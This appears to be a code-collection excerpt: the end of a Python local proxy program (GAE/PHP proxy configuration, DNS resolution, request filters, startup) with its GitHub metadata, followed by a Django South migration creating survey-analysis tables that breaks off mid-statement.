self.DNS_ENABLE = self.CONFIG.getint('dns', 'enable')
self.DNS_LISTEN = self.CONFIG.get('dns', 'listen')
self.DNS_SERVERS = self.HTTP_DNS or self.CONFIG.get('dns', 'servers').split('|')
self.DNS_BLACKLIST = set(self.CONFIG.get('dns', 'blacklist').split('|'))
self.DNS_TCPOVER = tuple(self.CONFIG.get('dns', 'tcpover').split('|')) if self.CONFIG.get('dns', 'tcpover').strip() else tuple()
if self.GAE_IPV6:
self.DNS_SERVERS = [x for x in self.DNS_SERVERS if ':' in x]
else:
self.DNS_SERVERS = [x for x in self.DNS_SERVERS if ':' not in x]
self.USERAGENT_ENABLE = self.CONFIG.getint('useragent', 'enable')
self.USERAGENT_STRING = self.CONFIG.get('useragent', 'string')
self.LOVE_ENABLE = self.CONFIG.getint('love', 'enable')
self.LOVE_TIP = self.CONFIG.get('love', 'tip').encode('utf8').decode('unicode-escape').split('|')
self.keep_run = True
def extend_iplist(self, iplist_name, hosts):
logging.info('extend_iplist start for hosts=%s', hosts)
new_iplist = []
def do_remote_resolve(host, dnsserver, queue):
assert isinstance(dnsserver, basestring)
for dnslib_resolve in (dnslib_resolve_over_udp, dnslib_resolve_over_tcp):
try:
time.sleep(random.random())
iplist = dnslib_record2iplist(dnslib_resolve(host, [dnsserver], timeout=4, blacklist=self.DNS_BLACKLIST))
queue.put((host, dnsserver, iplist))
except (socket.error, OSError) as e:
logging.info('%s remote host=%r failed: %s', str(dnslib_resolve).split()[1], host, e)
time.sleep(1)
result_queue = Queue.Queue()
pool = __import__('gevent.pool', fromlist=['.']).Pool(8) if sys.modules.get('gevent') else None
for host in hosts:
for dnsserver in self.DNS_SERVERS:
logging.debug('remote resolve host=%r from dnsserver=%r', host, dnsserver)
if pool:
pool.spawn(do_remote_resolve, host, dnsserver, result_queue)
else:
thread.start_new_thread(do_remote_resolve, (host, dnsserver, result_queue))
for _ in xrange(len(self.DNS_SERVERS) * len(hosts) * 2):
try:
host, dnsserver, iplist = result_queue.get(timeout=16)
logging.debug('%r remote host=%r return %s', dnsserver, host, iplist)
if '.google' in host:
if self.GAE_IPV6:
iplist = [x for x in iplist if ':' in x]
else:
iplist = [x for x in iplist if is_google_ip(x)]
new_iplist += iplist
except Queue.Empty:
break
logging.info('extend_iplist finished, added %s', len(set(self.IPLIST_MAP[iplist_name])-set(new_iplist)))
self.IPLIST_MAP[iplist_name] = list(set(self.IPLIST_MAP[iplist_name] + new_iplist))
def resolve_iplist(self):
# https://support.google.com/websearch/answer/186669?hl=zh-Hans
def do_local_resolve(host, queue):
assert isinstance(host, basestring)
for _ in xrange(3):
try:
family = socket.AF_INET6 if self.GAE_IPV6 else socket.AF_INET
iplist = [x[-1][0] for x in socket.getaddrinfo(host, 80, family)]
queue.put((host, iplist))
except (socket.error, OSError) as e:
logging.warning('socket.getaddrinfo host=%r failed: %s', host, e)
time.sleep(0.1)
google_blacklist = ['216.239.32.20'] + list(self.DNS_BLACKLIST)
google_blacklist_prefix = tuple(x for x in self.DNS_BLACKLIST if x.endswith('.'))
for name, need_resolve_hosts in list(self.IPLIST_MAP.items()):
if all(re.match(r'\d+\.\d+\.\d+\.\d+', x) or ':' in x for x in need_resolve_hosts):
continue
need_resolve_remote = [x for x in need_resolve_hosts if ':' not in x and not re.match(r'\d+\.\d+\.\d+\.\d+', x)]
resolved_iplist = [x for x in need_resolve_hosts if x not in need_resolve_remote]
result_queue = Queue.Queue()
for host in need_resolve_remote:
logging.debug('local resolve host=%r', host)
thread.start_new_thread(do_local_resolve, (host, result_queue))
for _ in xrange(len(need_resolve_remote)):
try:
host, iplist = result_queue.get(timeout=8)
resolved_iplist += iplist
except Queue.Empty:
break
if name == 'google_hk' and need_resolve_remote:
for delay in (30, 60, 150, 240, 300, 450, 600, 900):
spawn_later(delay, self.extend_iplist, name, need_resolve_remote)
if name.startswith('google_') and name not in ('google_cn', 'google_hk') and resolved_iplist:
iplist_prefix = re.split(r'[\.:]', resolved_iplist[0])[0]
resolved_iplist = list(set(x for x in resolved_iplist if x.startswith(iplist_prefix)))
else:
resolved_iplist = list(set(resolved_iplist))
if name.startswith('google_'):
resolved_iplist = list(set(resolved_iplist) - set(google_blacklist))
resolved_iplist = [x for x in resolved_iplist if not x.startswith(google_blacklist_prefix)]
if len(resolved_iplist) == 0 and name in ('google_hk', 'google_cn') and not self.GAE_IPV6:
logging.error('resolve %s host return empty! please retry!', name)
sys.exit(-1)
logging.info('resolve name=%s host to iplist=%r', name, resolved_iplist)
common.IPLIST_MAP[name] = resolved_iplist
if self.IPLIST_MAP.get('google_cn', []):
try:
for _ in xrange(4):
socket.create_connection((random.choice(self.IPLIST_MAP['google_cn']), 80), timeout=2).close()
except socket.error:
self.IPLIST_MAP['google_cn'] = []
if len(self.IPLIST_MAP.get('google_cn', [])) < 4 and self.IPLIST_MAP.get('google_hk', []):
logging.warning('google_cn resolved too short iplist=%s, switch to google_hk', self.IPLIST_MAP.get('google_cn', []))
self.IPLIST_MAP['google_cn'] = self.IPLIST_MAP['google_hk']
def info(self):
info = ''
info += '------------------------------------------------------\n'
info += 'PHP Proxy Version : %s (python/%s gevent/%s pyopenssl/%s)\n' % (__version__, platform.python_version(), gevent.__version__, OpenSSL.__version__)
info += 'Uvent Version : %s (pyuv/%s libuv/%s)\n' % (__import__('uvent').__version__, __import__('pyuv').__version__, __import__('pyuv').LIBUV_VERSION) if all(x in sys.modules for x in ('pyuv', 'uvent')) else ''
info += 'Local Proxy : %s:%s\n' % (self.PROXY_HOST, self.PROXY_PORT) if self.PROXY_ENABLE else ''
info += 'Debug INFO : %s\n' % self.LISTEN_DEBUGINFO if self.LISTEN_DEBUGINFO else ''
if common.GAE_ENABLE:
info += 'Listen Address : %s:%d\n' % (self.LISTEN_IP, self.LISTEN_PORT)
info += 'GAE Mode : %s\n' % self.GAE_MODE
info += 'GAE IPv6 : %s\n' % self.GAE_IPV6 if self.GAE_IPV6 else ''
info += 'GAE APPID : %s\n' % '|'.join(self.GAE_APPIDS)
info += 'GAE Validate : %s\n' % self.GAE_VALIDATE if self.GAE_VALIDATE else ''
info += 'GAE Obfuscate : %s\n' % self.GAE_OBFUSCATE if self.GAE_OBFUSCATE else ''
if common.PAC_ENABLE:
info += 'Pac Server : http://%s:%d/%s\n' % (self.PAC_IP if self.PAC_IP and self.PAC_IP != '0.0.0.0' else ProxyUtil.get_listen_ip(), self.PAC_PORT, self.PAC_FILE)
info += 'Pac File : file://%s\n' % os.path.abspath(self.PAC_FILE)
if common.PHP_ENABLE:
info += 'PHP Listen : %s\n' % common.PHP_LISTEN
info += 'PHP FetchServers : %s\n' % common.PHP_FETCHSERVERS
if common.DNS_ENABLE:
info += 'DNS Listen : %s\n' % common.DNS_LISTEN
info += 'DNS Servers : %s\n' % '|'.join(common.DNS_SERVERS)
info += '------------------------------------------------------\n'
return info
common = Common()
def pre_start():
if gevent.__version__ < '1.0':
logging.warning("*NOTE*, please upgrade to gevent 1.1 as possible")
if GAEProxyHandler.max_window != common.GAE_WINDOW:
GAEProxyHandler.max_window = common.GAE_WINDOW
if common.GAE_CACHESOCK:
GAEProxyHandler.tcp_connection_cachesock = True
GAEProxyHandler.ssl_connection_cachesock = True
if common.GAE_KEEPALIVE:
GAEProxyHandler.tcp_connection_cachesock = True
GAEProxyHandler.tcp_connection_keepalive = True
GAEProxyHandler.ssl_connection_cachesock = True
GAEProxyHandler.ssl_connection_keepalive = True
if common.IPLIST_PREDEFINED:
GAEProxyHandler.iplist_predefined = set(common.IPLIST_PREDEFINED)
if common.GAE_PAGESPEED and not common.GAE_OBFUSCATE:
logging.critical("*NOTE*, [gae]pagespeed=1 requires [gae]obfuscate=1")
sys.exit(-1)
if common.GAE_SSLVERSION and not sysconfig.get_platform().startswith('macosx-'):
GAEProxyHandler.ssl_version = getattr(ssl, 'PROTOCOL_%s' % common.GAE_SSLVERSION)
GAEProxyHandler.openssl_context = SSLConnection.context_builder(common.GAE_SSLVERSION)
if common.GAE_ENABLE and common.GAE_APPIDS[0] == 'goagent':
logging.warning('please edit %s to add your appid to [gae] !', common.CONFIG_FILENAME)
if common.GAE_ENABLE and common.GAE_MODE == 'http' and common.GAE_PASSWORD == '':
logging.critical('to enable http mode, you should set %r [gae]password = <your_pass> and [gae]options = rc4', common.CONFIG_FILENAME)
sys.exit(-1)
if common.GAE_TRANSPORT:
GAEProxyHandler.disable_transport_ssl = False
if common.PAC_ENABLE:
pac_ip = ProxyUtil.get_listen_ip() if common.PAC_IP in ('', '::', '0.0.0.0') else common.PAC_IP
url = 'http://%s:%d/%s' % (pac_ip, common.PAC_PORT, common.PAC_FILE)
spawn_later(600, urllib2.build_opener(urllib2.ProxyHandler({})).open, url)
if not common.DNS_ENABLE:
if not common.HTTP_DNS:
common.HTTP_DNS = common.DNS_SERVERS[:]
for dnsservers_ref in (common.HTTP_DNS, common.DNS_SERVERS):
any(dnsservers_ref.insert(0, x) for x in [y for y in get_dnsserver_list() if y not in dnsservers_ref])
GAEProxyHandler.dns_servers = common.HTTP_DNS
GAEProxyHandler.dns_blacklist = common.DNS_BLACKLIST
else:
GAEProxyHandler.dns_servers = common.HTTP_DNS or common.DNS_SERVERS
GAEProxyHandler.dns_blacklist = common.DNS_BLACKLIST
RangeFetch.threads = common.AUTORANGE_THREADS
RangeFetch.maxsize = common.AUTORANGE_MAXSIZE
RangeFetch.bufsize = common.AUTORANGE_BUFSIZE
RangeFetch.waitsize = common.AUTORANGE_WAITSIZE
if True:
GAEProxyHandler.handler_filters.insert(0, AutoRangeFilter(common.AUTORANGE_HOSTS, common.AUTORANGE_ENDSWITH, common.AUTORANGE_NOENDSWITH, common.AUTORANGE_MAXSIZE))
if common.GAE_REGIONS:
GAEProxyHandler.handler_filters.insert(0, DirectRegionFilter(common.GAE_REGIONS))
if common.HOST_MAP or common.HOST_POSTFIX_MAP or common.HOSTPORT_MAP or common.HOSTPORT_POSTFIX_MAP or common.URLRE_MAP:
GAEProxyHandler.handler_filters.insert(0, HostsFilter(common.IPLIST_MAP, common.HOST_MAP, common.HOST_POSTFIX_MAP, common.HOSTPORT_MAP, common.HOSTPORT_POSTFIX_MAP, common.URLRE_MAP))
if common.CRLF_SITES:
GAEProxyHandler.handler_filters.insert(0, CRLFSitesFilter(common.CRLF_SITES, common.NOCRLF_SITES))
if common.URLREWRITE_MAP:
GAEProxyHandler.handler_filters.insert(0, URLRewriteFilter(common.URLREWRITE_MAP, common.FORCEHTTPS_SITES, common.NOFORCEHTTPS_SITES))
if common.FAKEHTTPS_SITES:
GAEProxyHandler.handler_filters.insert(0, FakeHttpsFilter(common.FAKEHTTPS_SITES, common.NOFAKEHTTPS_SITES))
if common.FORCEHTTPS_SITES:
GAEProxyHandler.handler_filters.insert(0, ForceHttpsFilter(common.FORCEHTTPS_SITES, common.NOFORCEHTTPS_SITES))
if common.WITHGAE_SITES or common.WITHPHP_SITES or common.WITHVPS_SITES:
GAEProxyHandler.handler_filters.insert(0, WithGAEFilter(common.WITHGAE_SITES, common.WITHPHP_SITES, common.WITHVPS_SITES))
if common.USERAGENT_ENABLE:
GAEProxyHandler.handler_filters.insert(0, UserAgentFilter(common.USERAGENT_STRING))
if common.LISTEN_USERNAME:
GAEProxyHandler.handler_filters.insert(0, AuthFilter(common.LISTEN_USERNAME, common.LISTEN_PASSWORD))
def main():
global __file__
__file__ = os.path.abspath(__file__)
if os.path.islink(__file__):
__file__ = getattr(os, 'readlink', lambda x: x)(__file__)
os.chdir(os.path.dirname(os.path.abspath(__file__)))
pre_start()
logging.info(common.info())
if common.CONTROL_ENABLE:
control_server = LocalProxyServer((common.CONTROL_IP, common.CONTROL_PORT), web_control.RemoteContralServerHandler)
p = threading.Thread(target=control_server.serve_forever)
p.setDaemon(True)
p.start()
if common.PHP_ENABLE:
host, port = common.PHP_LISTEN.split(':')
HandlerClass = PHPProxyHandler if not common.PROXY_ENABLE else ProxyPHPProxyHandler
HandlerClass.handler_plugins['php'] = PHPFetchPlugin(common.PHP_FETCHSERVERS, common.PHP_PASSWORD, common.PHP_VALIDATE)
php_server = LocalProxyServer((host, int(port)), HandlerClass)
thread.start_new_thread(php_server.serve_forever, tuple())
CertUtil.init_ca()
while common.keep_run:
gevent.sleep(1)
sys.exit(0)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
sys.exit()
|
{
"content_hash": "fd53b3a98914618fd975fc0b6ff1366d",
"timestamp": "",
"source": "github",
"line_count": 1172,
"max_line_length": 285,
"avg_line_length": 48.95477815699659,
"alnum_prop": 0.5886013071895425,
"repo_name": "viger/docker",
"id": "e17b2a894932359003d02ac6b1d7cabf2d84efee",
"size": "59840",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "proxy/proxy/code/default/php_proxy/local/proxy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "88"
},
{
"name": "C",
"bytes": "1497159"
},
{
"name": "C++",
"bytes": "252"
},
{
"name": "CSS",
"bytes": "86313"
},
{
"name": "HTML",
"bytes": "140262"
},
{
"name": "JavaScript",
"bytes": "345775"
},
{
"name": "Nginx",
"bytes": "3472"
},
{
"name": "PHP",
"bytes": "10671"
},
{
"name": "Python",
"bytes": "16457633"
},
{
"name": "Shell",
"bytes": "33864"
},
{
"name": "Visual Basic",
"bytes": "1700"
}
],
"symlink_target": ""
}
|
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Entrevista'
db.create_table(u'analisis_entrevista', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=200)),
('posicion', self.gf('django.db.models.fields.CharField')(max_length=200)),
('email', self.gf('django.db.models.fields.EmailField')(max_length=75)),
('organizacion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mapeo.Organizaciones'])),
('pais', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['lugar.Pais'])),
('telefono', self.gf('django.db.models.fields.IntegerField')()),
('fecha', self.gf('django.db.models.fields.DateField')()),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50)),
('alcance1', self.gf('django.db.models.fields.IntegerField')()),
('tipo_estudio', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['configuracion.Tipo_Estudio'])),
('usuario', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
))
db.send_create_signal(u'analisis', ['Entrevista'])
# Adding M2M table for field departamento on 'Entrevista'
m2m_table_name = db.shorten_name(u'analisis_entrevista_departamento')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('entrevista', models.ForeignKey(orm[u'analisis.entrevista'], null=False)),
('departamento', models.ForeignKey(orm[u'lugar.departamento'], null=False))
))
db.create_unique(m2m_table_name, ['entrevista_id', 'departamento_id'])
# Adding model 'Pregunta_1'
db.create_table(u'analisis_pregunta_1', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('proyecto', self.gf('django.db.models.fields.CharField')(max_length=250)),
('estado1', self.gf('django.db.models.fields.IntegerField')()),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50)),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_1'])
# Adding M2M table for field ubicacion on 'Pregunta_1'
m2m_table_name = db.shorten_name(u'analisis_pregunta_1_ubicacion')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_1', models.ForeignKey(orm[u'analisis.pregunta_1'], null=False)),
('municipio', models.ForeignKey(orm[u'lugar.municipio'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_1_id', 'municipio_id'])
# Adding M2M table for field socio on 'Pregunta_1'
m2m_table_name = db.shorten_name(u'analisis_pregunta_1_socio')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_1', models.ForeignKey(orm[u'analisis.pregunta_1'], null=False)),
('organizaciones', models.ForeignKey(orm[u'mapeo.organizaciones'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_1_id', 'organizaciones_id'])
# Adding M2M table for field tema on 'Pregunta_1'
m2m_table_name = db.shorten_name(u'analisis_pregunta_1_tema')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_1', models.ForeignKey(orm[u'analisis.pregunta_1'], null=False)),
('tema', models.ForeignKey(orm[u'configuracion.tema'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_1_id', 'tema_id'])
# Adding model 'Pregunta_2'
db.create_table(u'analisis_pregunta_2', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('seleccion1', self.gf('django.db.models.fields.IntegerField')()),
('hombre', self.gf('django.db.models.fields.IntegerField')()),
('mujer', self.gf('django.db.models.fields.IntegerField')()),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_2'])
# Adding model 'Pregunta_3'
db.create_table(u'analisis_pregunta_3', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_3'])
# Adding M2M table for field grupo on 'Pregunta_3'
m2m_table_name = db.shorten_name(u'analisis_pregunta_3_grupo')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_3', models.ForeignKey(orm[u'analisis.pregunta_3'], null=False)),
('grupo', models.ForeignKey(orm[u'configuracion.grupo'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_3_id', 'grupo_id'])
# Adding model 'Pregunta_4'
db.create_table(u'analisis_pregunta_4', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('impacto', self.gf('django.db.models.fields.CharField')(max_length=250)),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_4'])
# Adding M2M table for field grupo_beneficiario on 'Pregunta_4'
m2m_table_name = db.shorten_name(u'analisis_pregunta_4_grupo_beneficiario')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_4', models.ForeignKey(orm[u'analisis.pregunta_4'], null=False)),
('grupo', models.ForeignKey(orm[u'configuracion.grupo'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_4_id', 'grupo_id'])
# Adding M2M table for field tema on 'Pregunta_4'
m2m_table_name = db.shorten_name(u'analisis_pregunta_4_tema')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_4', models.ForeignKey(orm[u'analisis.pregunta_4'], null=False)),
('tema', models.ForeignKey(orm[u'configuracion.tema'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_4_id', 'tema_id'])
# Adding model 'Pregunta_5a'
db.create_table(u'analisis_pregunta_5a', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('innovacion', self.gf('django.db.models.fields.CharField')(max_length=250)),
('prioritizado', self.gf('django.db.models.fields.IntegerField')()),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_5a'])
# Adding M2M table for field ubicacion on 'Pregunta_5a'
m2m_table_name = db.shorten_name(u'analisis_pregunta_5a_ubicacion')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_5a', models.ForeignKey(orm[u'analisis.pregunta_5a'], null=False)),
('municipio', models.ForeignKey(orm[u'lugar.municipio'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_5a_id', 'municipio_id'])
# Adding M2M table for field socio on 'Pregunta_5a'
m2m_table_name = db.shorten_name(u'analisis_pregunta_5a_socio')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_5a', models.ForeignKey(orm[u'analisis.pregunta_5a'], null=False)),
('organizaciones', models.ForeignKey(orm[u'mapeo.organizaciones'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_5a_id', 'organizaciones_id'])
# Adding M2M table for field tema on 'Pregunta_5a'
m2m_table_name = db.shorten_name(u'analisis_pregunta_5a_tema')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_5a', models.ForeignKey(orm[u'analisis.pregunta_5a'], null=False)),
('tema', models.ForeignKey(orm[u'configuracion.tema'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_5a_id', 'tema_id'])
# Adding model 'Pregunta_5c'
db.create_table(u'analisis_pregunta_5c', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('innovacion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Pregunta_5a'])),
('organizacion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mapeo.Organizaciones'])),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_5c'])
# Adding M2M table for field papel_1 on 'Pregunta_5c'
m2m_table_name = db.shorten_name(u'analisis_pregunta_5c_papel_1')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_5c', models.ForeignKey(orm[u'analisis.pregunta_5c'], null=False)),
('papel', models.ForeignKey(orm[u'configuracion.papel'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_5c_id', 'papel_id'])
# Adding model 'Pregunta_5d'
db.create_table(u'analisis_pregunta_5d', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('innovacion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Pregunta_5a'])),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_5d'])
# Adding M2M table for field categoria on 'Pregunta_5d'
m2m_table_name = db.shorten_name(u'analisis_pregunta_5d_categoria')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_5d', models.ForeignKey(orm[u'analisis.pregunta_5d'], null=False)),
('categoria', models.ForeignKey(orm[u'configuracion.categoria'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_5d_id', 'categoria_id'])
# Adding model 'Pregunta_5e'
db.create_table(u'analisis_pregunta_5e', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('innovacion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Pregunta_5a'])),
('fuente', self.gf('django.db.models.fields.CharField')(max_length=200)),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_5e'])
# Adding M2M table for field categoria_fuente on 'Pregunta_5e'
m2m_table_name = db.shorten_name(u'analisis_pregunta_5e_categoria_fuente')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_5e', models.ForeignKey(orm[u'analisis.pregunta_5e'], null=False)),
('categoria_fuente', models.ForeignKey(orm[u'configuracion.categoria_fuente'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_5e_id', 'categoria_fuente_id'])
# Adding model 'Pregunta_6a'
db.create_table(u'analisis_pregunta_6a', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('innovacion', self.gf('django.db.models.fields.CharField')(max_length=200)),
('prioritizado', self.gf('django.db.models.fields.IntegerField')()),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_6a'])
# Adding M2M table for field ubicacion on 'Pregunta_6a'
m2m_table_name = db.shorten_name(u'analisis_pregunta_6a_ubicacion')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_6a', models.ForeignKey(orm[u'analisis.pregunta_6a'], null=False)),
('municipio', models.ForeignKey(orm[u'lugar.municipio'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_6a_id', 'municipio_id'])
# Adding M2M table for field tema on 'Pregunta_6a'
m2m_table_name = db.shorten_name(u'analisis_pregunta_6a_tema')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_6a', models.ForeignKey(orm[u'analisis.pregunta_6a'], null=False)),
('tema', models.ForeignKey(orm[u'configuracion.tema'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_6a_id', 'tema_id'])
# Adding model 'Pregunta_6c'
db.create_table(u'analisis_pregunta_6c', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('innovacion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Pregunta_6a'])),
('organizacion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mapeo.Organizaciones'])),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_6c'])
# Adding M2M table for field papel on 'Pregunta_6c'
m2m_table_name = db.shorten_name(u'analisis_pregunta_6c_papel')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_6c', models.ForeignKey(orm[u'analisis.pregunta_6c'], null=False)),
('papel', models.ForeignKey(orm[u'configuracion.papel'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_6c_id', 'papel_id'])
# Adding model 'Pregunta_6d'
db.create_table(u'analisis_pregunta_6d', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('innovacion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Pregunta_6a'])),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_6d'])
# Adding M2M table for field categoria on 'Pregunta_6d'
m2m_table_name = db.shorten_name(u'analisis_pregunta_6d_categoria')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_6d', models.ForeignKey(orm[u'analisis.pregunta_6d'], null=False)),
('categoria', models.ForeignKey(orm[u'configuracion.categoria'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_6d_id', 'categoria_id'])
# Adding model 'Pregunta_6e'
db.create_table(u'analisis_pregunta_6e', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('innovacion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Pregunta_6a'])),
('conocimient', self.gf('django.db.models.fields.CharField')(max_length=200)),
('categoria_innovacio', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['configuracion.Categoria_Innovacion'])),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_6e'])
# Adding M2M table for field categoria_conocimient on 'Pregunta_6e'
m2m_table_name = db.shorten_name(u'analisis_pregunta_6e_categoria_conocimient')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_6e', models.ForeignKey(orm[u'analisis.pregunta_6e'], null=False)),
('categoria_conocimiento', models.ForeignKey(orm[u'configuracion.categoria_conocimiento'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_6e_id', 'categoria_conocimiento_id'])
# Adding model 'Pregunta_7a'
db.create_table(u'analisis_pregunta_7a', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_7a'])
# Adding M2M table for field ubicacion on 'Pregunta_7a'
m2m_table_name = db.shorten_name(u'analisis_pregunta_7a_ubicacion')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_7a', models.ForeignKey(orm[u'analisis.pregunta_7a'], null=False)),
('municipio', models.ForeignKey(orm[u'lugar.municipio'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_7a_id', 'municipio_id'])
# Adding M2M table for field seleccion on 'Pregunta_7a'
m2m_table_name = db.shorten_name(u'analisis_pregunta_7a_seleccion')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pregunta_7a', models.ForeignKey(orm[u'analisis.pregunta_7a'], null=False)),
('seleccion_7a', models.ForeignKey(orm[u'configuracion.seleccion_7a'], null=False))
))
db.create_unique(m2m_table_name, ['pregunta_7a_id', 'seleccion_7a_id'])
# Adding model 'Pregunta_7b'
db.create_table(u'analisis_pregunta_7b', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('entrevistado', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['analisis.Entrevista'])),
))
db.send_create_signal(u'analisis', ['Pregunta_7b'])
# Adding M2M table for field seleccion on 'Pregunta_7b'
m2m_table_name = db.shorten_name(u'analisis_pregunta_7b_seleccion')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
